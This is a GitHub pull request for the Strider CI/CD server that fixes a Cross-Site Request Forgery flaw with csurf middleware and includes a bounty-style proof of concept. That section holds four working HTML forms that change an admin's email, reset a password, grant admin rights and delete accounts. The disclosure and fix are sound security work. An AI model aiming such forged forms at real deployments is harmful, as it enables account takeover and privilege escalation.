search

Strider-CD / strider

Open Source Continuous Integration & Deployment Server
http://strider-cd.github.io/
4.6k stars 432 forks source link

Security Fix for Cross-site Request Forgery (CSRF) - huntr.dev #1121

Closed huntr-helper closed 3 years ago

huntr-helper commented 3 years ago

https://huntr.dev/users/arjunshibu has fixed the Cross-site Request Forgery (CSRF) vulnerability πŸ”¨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A Version Affected | ALL Bug Fix | YES Original Pull Request | https://github.com/418sec/strider/pull/1 Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/other/strider/1/README.md

User Comments:

πŸ“Š Metadata *

Bounty URL: https://www.huntr.dev/bounties/1-other-strider

βš™οΈ Description *

Strider is an Open Source Continuous Deployment / Continuous Integration platform. It is written in Node.js and Ember.js and uses MongoDB as a backing store. This platform is vulnerable to Cross-Site Request Forgery (CSRF). It allowes an attacker to takeover accounts, privillege escalation and accounts deletion.

πŸ’» Technical Description *

CSRF Protection is implemented using csurf middleware.

πŸ› Proof of Concept (PoC) *

  1. Setup MongoDB
  2. Install the package 
    git clone https://github.com/Strider-CD/strider.git
cd strider/apps/strider
npm i
node bin/strider addUser # add users accordingly
NODE_ENV=production npm start # start server
  3. Login as admin
  4. Use any of the CSRF POCs

    Change email

    <html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:3000/api/account/email" method="POST">
  <input type="hidden" name="email" value="admin2&#64;test&#46;com" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

    Change password

    <html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:3000/api/account/password" method="POST">
  <input type="hidden" name="password" value="hacked" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

    Privilege escalation

    <html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:3000/admin/make_admin">
  <input type="hidden" name="user" value="user&#64;test&#46;com" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

    Account deletion

    <html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:3000/admin/remove_user" method="POST">
  <input type="hidden" name="email" value="admin&#64;test&#46;com" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

πŸ”₯ Proof of Fix (PoF) *

  1. Build app 
    cd strider/apps/strider
npm i
npm run build
  2. Build client 
    cd strider/clients/classic-ui
npm i
npm run build
  3. Start server

Before fix:

image

After fix:

image image

πŸ‘ User Acceptance Testing (UAT)

vercel[bot] commented 3 years ago

This pull request is being automatically deployed with Vercel (learn more).
To see the status of your deployment, click below or on the icon next to each commit.

πŸ” Inspect: https://vercel.com/knownasilya1/strider/3121f5wf5
βœ… Preview: https://strider-git-fork-418sec-1-other-strider.knownasilya1.vercel.app

knownasilya commented 3 years ago

Thanks for this, looks good!